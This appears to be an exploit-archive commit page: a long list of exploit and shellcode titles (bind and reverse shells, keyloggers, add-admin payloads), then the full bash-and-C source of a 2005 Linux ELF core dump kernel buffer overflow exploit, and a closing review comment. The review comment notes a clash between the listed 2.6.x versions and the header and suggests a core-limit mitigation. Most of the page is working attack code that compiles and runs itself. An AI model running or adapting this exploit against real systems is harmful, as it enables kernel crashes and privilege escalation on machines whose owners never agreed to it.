
12 new exploits Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation Exploit Linux Kernel < 2.6.31-rc4 - nfs4_proc_lock() Denial of Service FreeBSD/x86 - /bin/cat /etc/master.passwd NULL free shellcode (65 bytes) FreeBSD/x86 - /bin/cat /etc/master.passwd Null Free Shellcode (65 bytes) Linux/x86 - execve shellcode null byte free (Generator) Linux/x86 - execve Null Free shellcode (Generator) Linux/x86 - cmd shellcode null free (Generator) Linux/x86 - cmd Null Free shellcode (Generator) iOS - Version-independent shellcode Linux/x86-64 - bindshell port:4444 shellcode (132 bytes) Linux/x86-64 - bindshell port 4444 shellcode (132 bytes) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) NULL Free shellcode (39 bytes) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free shellcode (39 bytes) Windows 5.0 < 7.0 x86 - null-free bindshell shellcode Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 shellcode Win32 - telnetbind by Winexec shellcode (111 bytes) Win32 - telnetbind by Winexec 23 port shellcode (111 bytes) Windows NT/2000/XP - add user _slim_ shellcode for Russian systems (318 bytes) Windows NT/2000/XP (Russian) - Add User _slim_ Shellcode (318 bytes) Windows XP Pro SP2 English - _Message-Box_ Shellcode Null-Free (16 bytes) Windows XP Pro SP2 English - _Wordpad_ Shellcode Null Free (12 bytes) Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes) Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes) Linux/x86 - /bin/sh Null-Free Polymorphic Shellcode (46 bytes) Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes) Win32 - Add new local administrator shellcode _secuid0_ (326 bytes) Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes) ARM - Bindshell port 0x1337shellcode ARM - Bindshell port 0x1337 shellcode Linux Kernel <= 2.6.36 - VIDIOCSMICROCODE 
IOCTL Local Memory Overwrite Linux Kernel <= 2.4.0 - Stack Infoleaks bsd/x86 - connect back Shellcode (81 bytes) FreeBSD/x86 - connect back Shellcode (81 bytes) Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.10/11.04) - Privilege Boundary Crossing Local Root Exploit Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Privilege Boundary Crossing Local Root Exploit Linux Kernel 2.0 / 2.1 - SIGIO Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process Linux Kernel 2.2 - 'ldd core' Force Reboot Debian 2.1_ Linux Kernel 2.0.x_ RedHat 5.2 - Packet Length with Options Linux Kernel 2.0.x (Debian 2.1 / RedHat 5.2) - Packet Length with Options Linux Kernel 2.2.x - Non-Readable File Ptrace Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak OS X 10.x_ FreeBSD 4.x_OpenBSD 2.x_Solaris 2.5/2.6/7.0/8 exec C Library Standard I/O File Descriptor Closure OS X 10.x_ FreeBSD 4.x_ OpenBSD 2.x_ Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (1) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (2) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (1) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (2) Linux Kernel 2.4 - suid execve() System Call Race Condition PoC Linux Kernel 2.4 - suid execve() System Call Race Condition Executable File Read Proof of Concept Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read Linux Kernel <= 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure Microsoft Internet Explorer 6.0_ Firefox 0.x_Netscape 7.x - IMG Tag Multiple Vulnerabilities Microsoft Internet Explorer 6.0 / Firefox 0.x / Netscape 7.x - IMG Tag Multiple Vulnerabilities Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling 
Vulnerabilities Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1) Linux/x86 - Reverse TCP Bind Shellcode (92 bytes) Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes) Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow Linux/x86-64 - Bind TCP port shellcode (81 bytes / 96 bytes with password) Linux/x86-64 - Bind TCP 4444 Port Shellcode (81 bytes / 96 bytes with password) Linux/x86 - TCP Bind Shel shellcode l (96 bytes) Linux/x86 - TCP Bind Shell 33333 Port Shellcode (96 bytes) Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation Windows x86 - user32!MessageBox _Hello World!_ Null-Free shellcode (199 bytes) Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes) OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes) OS-X/x86-64 - /bin/sh Null Free Shellcode (34 bytes) Mainframe/System Z - Bind Shell shellcode (2488 bytes) Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes) OS-X/x86-64 - tcp bind shellcode_ NULL byte free (144 bytes) OS-X/x86-64 - tcp 4444 port bind Nullfree shellcode (144 bytes) Ubuntu Apport - Local Privilege Escalation Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation Linux/x86-64 - Bindshell with Password shellcode (92 bytes) Linux/x86-64 - Bindshell 31173 port with Password shellcode (92 bytes) Windows XP < 10 - Null-Free WinExec Shellcode (Python) (Generator) Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator) Linux/x86-64 - bind TCP port shellcode (103 bytes) Linux/x86-64 - TCP Bindshell with Password Prompt shellcode (162 bytes) Linux/x86-64 - Bind TCP 4444 Port Shellcode (103 bytes) Linux/x86-64 - TCP 4444 port Bindshell with Password Prompt shellcode (162 bytes) Windows x86 - Null-Free Download & Run via WebDAV Shellcode (96 bytes) Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes) 
Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption Linux Kernel 3.10 / 3.18 / 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption Windows - Null-Free Shellcode Primitive Keylogger to File (431 (0x01AF) bytes) Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes) Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow) Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow) Windows - Null-Free Shellcode Functional Keylogger to File (601 (0x0259) bytes) Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes) Linux/x86-64 - Null-Free Reverse TCP Shell shellcode (134 bytes) Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes) Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes) Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes) Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes) Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)
/*
|
|
source: http://www.securityfocus.com/bid/13589/info
|
|
|
|
The Linux kernel is susceptible to a local buffer-overflow vulnerability when attempting to create ELF coredumps. This issue is due to an integer-overflow flaw that results in a kernel buffer overflow during a 'copy_from_user()' call.
|
|
|
|
To exploit this vulnerability, a malicious user creates a malicious ELF executable designed to create a negative 'len' variable in 'elf_core_dump()'.
|
|
|
|
Local users may exploit this vulnerability to execute arbitrary machine code in the context of the kernel, facilitating privilege escalation.
|
|
|
|
**Update: This vulnerability does not exist in the 2.6 kernel tree.
|
|
*/
|
|
|
|
#!/bin/bash
|
|
#
|
|
# elfcd.sh
|
|
# warning: This code will crash your machine
|
|
#
|
|
cat <<__EOF__>elfcd1.c
|
|
/*
|
|
* Linux binfmt_elf core dump buffer overflow
|
|
*
|
|
* Copyright (c) 2005 iSEC Security Research. All Rights Reserved.
|
|
*
|
|
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
|
|
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
|
|
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
|
|
*
|
|
*/
|
|
// phase 1
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <errno.h>
|
|
#include <unistd.h>
|
|
|
|
#include <sys/time.h>
|
|
#include <sys/resource.h>
|
|
|
|
#include <asm/page.h>
|
|
|
|
|
|
static char *env[10], *argv[4];
|
|
static char page[PAGE_SIZE];
|
|
static char buf[PAGE_SIZE];
|
|
|
|
|
|
void fatal(const char *msg)
|
|
{
|
|
if(!errno) {
|
|
fprintf(stderr, "\nFATAL: %s\n", msg);
|
|
}
|
|
else {
|
|
printf("\n");
|
|
perror(msg);
|
|
}
|
|
fflush(stdout); fflush(stderr);
|
|
_exit(129);
|
|
}
|
|
|
|
|
|
int main(int ac, char **av)
|
|
{
|
|
int esp, i, r;
|
|
struct rlimit rl;
|
|
|
|
__asm__("movl %%esp, %0" : : "m"(esp));
|
|
printf("\n[+] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0], av[ac-1]+strlen(av[ac-1]), esp);
|
|
rl.rlim_cur = RLIM_INFINITY;
|
|
rl.rlim_max = RLIM_INFINITY;
|
|
r = setrlimit(RLIMIT_CORE, &rl);
|
|
if(r) fatal("setrlimit");
|
|
|
|
memset(env, 0, sizeof(env) );
|
|
memset(argv, 0, sizeof(argv) );
|
|
memset(page, 'A', sizeof(page) );
|
|
page[PAGE_SIZE-1]=0;
|
|
|
|
// move up env & exec phase 2
|
|
if(!strcmp(av[0], "AAAA")) {
|
|
printf("\n[+] phase 2, <RET> to crash "); fflush(stdout);
|
|
argv[0] = "elfcd2";
|
|
argv[1] = page;
|
|
|
|
// term 0 counts!
|
|
memset(buf, 0, sizeof(buf) );
|
|
for(i=0; i<789 + 4; i++)
|
|
buf[i] = 'C';
|
|
argv[2] = buf;
|
|
execve(argv[0], argv, env);
|
|
_exit(127);
|
|
}
|
|
|
|
// move down env & reexec
|
|
for(i=0; i<9; i++)
|
|
env[i] = page;
|
|
|
|
argv[0] = "AAAA";
|
|
printf("\n[+] phase 1"); fflush(stdout);
|
|
execve(av[0], argv, env);
|
|
|
|
return 0;
|
|
}
|
|
__EOF__
|
|
cat <<__EOF__>elfcd2.c
|
|
// phase 2
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <syscall.h>
|
|
|
|
#include <sys/syscall.h>
|
|
|
|
#include <asm/page.h>
|
|
|
|
#define __NR_sys_read __NR_read
|
|
#define __NR_sys_kill __NR_kill
|
|
#define __NR_sys_getpid __NR_getpid
|
|
|
|
|
|
char stack[4096 * 6];
|
|
static int errno;
|
|
|
|
|
|
inline _syscall3(int, sys_read, int, a, void*, b, int, l);
|
|
inline _syscall2(int, sys_kill, int, c, int, a);
|
|
inline _syscall0(int, sys_getpid);
|
|
|
|
|
|
// yeah, lets do it
|
|
void killme()
|
|
{
|
|
char c='a';
|
|
int pid;
|
|
|
|
pid = sys_getpid();
|
|
for(;;) {
|
|
sys_read(0, &c, 1);
|
|
sys_kill(pid, 11);
|
|
}
|
|
}
|
|
|
|
|
|
// safe stack stub
|
|
__asm__(
|
|
" nop \n"
|
|
"_start: movl \$0xbfff6ffc, %esp \n"
|
|
" jmp killme \n"
|
|
".global _start \n"
|
|
);
|
|
__EOF__
|
|
cat <<__EOF__>elfcd.ld
|
|
OUTPUT_FORMAT("elf32-i386", "elf32-i386",
|
|
"elf32-i386")
|
|
OUTPUT_ARCH(i386)
|
|
ENTRY(_start)
|
|
SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib); SEARCH_DIR(/usr/i486-suse-linux/lib);
|
|
|
|
MEMORY
|
|
{
|
|
ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0x8000
|
|
rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0x10000
|
|
}
|
|
|
|
PHDRS
|
|
{
|
|
headers PT_PHDR PHDRS ;
|
|
text PT_LOAD FILEHDR PHDRS ;
|
|
fuckme PT_LOAD AT (0xbfff8000) FLAGS (0x00) ;
|
|
}
|
|
|
|
SECTIONS
|
|
{
|
|
|
|
.dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0x7000; } >rom :fuckme
|
|
|
|
. = 0xbfff0000 + SIZEOF_HEADERS;
|
|
.text : { *(.text) } >ram :text
|
|
.data : { *(.data) } >ram :text
|
|
.bss :
|
|
{
|
|
*(.dynbss)
|
|
*(.bss)
|
|
*(.bss.*)
|
|
*(.gnu.linkonce.b.*)
|
|
*(COMMON)
|
|
. = ALIGN(32 / 8);
|
|
} >ram :text
|
|
|
|
}
|
|
__EOF__
|
|
|
|
# compile & run
|
|
echo -n "[+] Compiling..."
|
|
gcc -O2 -Wall elfcd1.c -o elfcd1
|
|
gcc -O2 -nostdlib elfcd2.c -o elfcd2 -Xlinker -T elfcd.ld -static
|
|
./elfcd1
|
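Review bot: The header comment of this file ends with "This vulnerability does not exist in the 2.6 kernel tree", yet the catalogue title in the commit description lists 2.6.x among the affected series; one of the two should be corrected so that anyone triaging against this entry scopes the right kernels. The header also describes only the attack side and gives a defender nothing to act on. From the visible code, phase 1 stops in `fatal("setrlimit")` when it cannot raise `RLIMIT_CORE`, and the crash is reached through the core dump of the phase 2 process after it signals itself, so a hard core-file limit of 0 for untrusted accounts presumably keeps this path from being reached on an unpatched host. I would add a line next to the existing warning, such as `# mitigation (to confirm): hard RLIMIT_CORE of 0 for untrusted users until the kernel is updated`, and repeat the affected-version statement from the header there.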